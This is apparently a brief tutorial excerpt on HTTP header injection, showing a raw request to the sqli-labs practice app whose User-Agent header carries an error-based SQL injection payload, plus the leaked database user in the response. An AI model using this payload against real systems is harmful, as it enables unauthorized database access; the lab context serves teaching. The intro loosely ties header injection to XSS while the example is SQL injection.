HTTP header injection is a security vulnerability that occurs when an attacker is able to inject malicious content into HTTP headers. This can have various security implications, including the potential for cross-site scripting (XSS) attacks or other forms of web application exploitation.
Example :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16POST /sqli-labs-master/Less-18/ HTTP/1.1
Host: 192.168.1.33
Content-Length: 38
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.33
Content-Type: application/x-www-form-urlencoded
User-Agent:1' and updatexml(1,concat(0x7e,(user()),0x7e),1) and '1'='1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.1.33/sqli-labs-master/Less-18/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
uname=admin&passwd=admin&submit=Submit
1
XPATH syntax error: '~root@localhost~'